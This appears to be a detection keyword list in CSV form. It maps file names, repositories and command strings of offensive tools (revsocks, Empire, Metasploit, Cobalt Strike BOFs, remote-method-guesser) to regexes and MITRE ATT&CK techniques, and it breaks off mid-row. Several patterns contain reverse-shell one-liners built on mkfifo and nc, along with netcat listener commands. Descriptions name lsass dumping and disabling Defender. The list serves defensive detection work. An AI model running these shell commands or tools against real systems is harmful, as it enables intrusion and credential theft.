"*revsocks_freebsd_amd64*",".{0,1000}revsocks_freebsd_amd64.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks_freebsd_arm*",".{0,1000}revsocks_freebsd_arm.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks_linux_386*",".{0,1000}revsocks_linux_386.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks_linux_amd64*",".{0,1000}revsocks_linux_amd64.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks_linux_arm*",".{0,1000}revsocks_linux_arm.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks_linux_mips*",".{0,1000}revsocks_linux_mips.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks_linux_mipsle*",".{0,1000}revsocks_linux_mipsle.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks_linux_s390x*",".{0,1000}revsocks_linux_s390x.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks_netbsd_386*",".{0,1000}revsocks_netbsd_386.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks_netbsd_amd64*",".{0,1000}revsocks_netbsd_amd64.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks_netbsd_arm*",".{0,1000}revsocks_netbsd_arm.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks_openbsd_386*",".{0,1000}revsocks_openbsd_386.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks_openbsd_amd64*",".{0,1000}revsocks_openbsd_amd64.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks_windows_386.exe*",".{0,1000}revsocks_windows_386\.exe.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks_windows_amd64.exe*",".{0,1000}revsocks_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocksserver.h*",".{0,1000}revsocksserver\.h.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/emilarner/revsocks","1","0","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","28","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z" "*revTCPclient.ps1*",".{0,1000}revTCPclient\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*RevTcpShell.exe*",".{0,1000}RevTcpShell\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*RevWinDefKiller.exe*",".{0,1000}RevWinDefKiller\.exe.{0,1000}","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","10","4","385","56","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z" "*RhinoSecurityLabs*",".{0,1000}RhinoSecurityLabs.{0,1000}","offensive_tool_keyword","Github Username","github repo hosting exploitation tools for pentesters","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/RhinoSecurityLabs","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*RhinoSecurityLabs/pacu*",".{0,1000}RhinoSecurityLabs\/pacu.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*-Rhost * -Port * -Cmd *cmd /c*",".{0,1000}\-Rhost\s.{0,1000}\s\-Port\s.{0,1000}\s\-Cmd\s.{0,1000}cmd\s\/c.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-Jenkins.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*rhosts_walker_spec.rb*",".{0,1000}rhosts_walker_spec\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ricardojoserf/NativeDump*",".{0,1000}ricardojoserf\/NativeDump.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","1","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*RiccardoAncarani/BOFs*",".{0,1000}RiccardoAncarani\/BOFs.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOFs) for shells and lols","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/BOFs","1","1","N/A","10","10","109","14","2021-09-14T09:03:58Z","2021-08-27T10:04:12Z" "*RiccardoAncarani/LiquidSnake*",".{0,1000}RiccardoAncarani\/LiquidSnake.{0,1000}","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless Lateral Movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","321","46","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" "*RiccardoAncarani/TaskShell*",".{0,1000}RiccardoAncarani\/TaskShell.{0,1000}","offensive_tool_keyword","cobaltstrike","tamper scheduled task with a binary","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/TaskShell","1","1","N/A","10","10","57","8","2021-02-15T19:23:13Z","2021-02-15T19:22:26Z" "*rid_hijack.py*",".{0,1000}rid_hijack\.py.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*ridbrute_attack*",".{0,1000}ridbrute_attack.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*RIDHIJACK.ps1*",".{0,1000}RIDHIJACK\.ps1.{0,1000}","offensive_tool_keyword","RID-Hijacking","RID Hijacking Proof of Concept script by Kevin Joyce","T1174","TA0003","N/A","N/A","Persistence","https://github.com/STEALTHbits/RIDHijackingProofofConceptKJ","1","1","N/A","9","1","16","7","2018-10-30T15:00:03Z","2018-10-29T19:52:10Z" "*ridrelay*",".{0,1000}ridrelay.{0,1000}","offensive_tool_keyword","ridrelay","Quick and easy way to get domain usernames while on an internal network.","T1175 - T1553.002 - T1553.003","TA0003 - TA0008 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/skorov/ridrelay","1","0","N/A","N/A","4","376","58","2020-05-20T03:35:32Z","2018-04-14T22:10:01Z" "*ring04h#s5.go*",".{0,1000}ring04h\#s5\.go.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*Ripemd-160.test-vectors.txt*",".{0,1000}Ripemd\-160\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*rkervella/CarbonMonoxide*",".{0,1000}rkervella\/CarbonMonoxide.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","22","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "*rlwrap -cAr nc -lvnp *",".{0,1000}rlwrap\s\-cAr\snc\s\-lvnp\s.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*rlwrap nc -lvnp *",".{0,1000}rlwrap\snc\s\-lvnp\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | sh -i 2>&1 | nc *",".{0,1000}rm\s\/tmp\/f\;mkfifo\s\/tmp\/f\;cat\s\/tmp\/f\s\|\ssh\s\-i\s2\>\&1\s\|\snc\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc * >/tmp/f*",".{0,1000}rm\s\/tmp\/f\;mkfifo\s\/tmp\/f\;cat\s\/tmp\/f\|sh\s\-i\s2\>\&1\|nc\s.{0,1000}\s\>\/tmp\/f.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|ncat -u * >/tmp/*",".{0,1000}rm\s\/tmp\/f\;mkfifo\s\/tmp\/f\;cat\s\/tmp\/f\|sh\s\-i\s2\>\&1\|ncat\s\-u\s.{0,1000}\s\>\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*rm -f *.o dump_vdso test_payload*",".{0,1000}rm\s\-f\s.{0,1000}\.o\sdump_vdso\stest_payload.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","0","N/A","N/A","10","942","392","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" "*rmg bind * jmxrmi --bind-objid *",".{0,1000}rmg\sbind\s.{0,1000}\sjmxrmi\s\-\-bind\-objid\s.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg bind *127.0.0.1:*--localhost-bypass*",".{0,1000}rmg\sbind\s.{0,1000}127\.0\.0\.1\:.{0,1000}\-\-localhost\-bypass.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg call * --plugin GenericPrint.jar*",".{0,1000}rmg\scall\s.{0,1000}\s\-\-plugin\sGenericPrint\.jar.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg call * --signature * --bound-name plain-server*",".{0,1000}rmg\scall\s.{0,1000}\s\-\-signature\s.{0,1000}\s\-\-bound\-name\splain\-server.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg codebase *http* --component *",".{0,1000}rmg\scodebase\s.{0,1000}http.{0,1000}\s\-\-component\s.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg codebase *java.util.HashMap *--bound-name legacy-service*",".{0,1000}rmg\scodebase\s.{0,1000}java\.util\.HashMap\s.{0,1000}\-\-bound\-name\slegacy\-service.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg enum *",".{0,1000}rmg\senum\s.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg guess * *",".{0,1000}rmg\sguess\s.{0,1000}\s.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg known javax.management.remote.rmi.RMIServerImpl_Stub*",".{0,1000}rmg\sknown\sjavax\.management\.remote\.rmi\.RMIServerImpl_Stub.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg listen * CommonsCollections*",".{0,1000}rmg\slisten\s.{0,1000}\sCommonsCollections.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg listen 0.0.0.0 *",".{0,1000}rmg\slisten\s0\.0\.0\.0\s.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg objid *[*",".{0,1000}rmg\sobjid\s.{0,1000}\[.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg roguejmx *",".{0,1000}rmg\sroguejmx\s.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - 